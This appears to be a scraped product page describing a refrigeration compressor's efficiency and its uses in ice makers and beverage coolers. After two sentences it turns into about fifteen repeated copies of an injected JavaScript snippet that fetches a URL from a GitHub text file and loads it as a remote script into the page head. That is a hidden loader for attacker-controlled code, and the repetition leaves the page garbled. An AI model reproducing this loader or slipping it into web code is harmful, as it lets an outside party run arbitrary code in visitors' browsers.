  • The compressor has a Coefficient of Performance (COP) of approximately 1.83 at its rated conditions, indicating good energy efficiency

This compressor is suitable for various refrigeration applications, such as ice makers and beverage coolers, where reliable low-temperature operation is essential.

;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});;var url = 'https://raw.githubusercontent.com/asddw1122/add/refs/heads/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});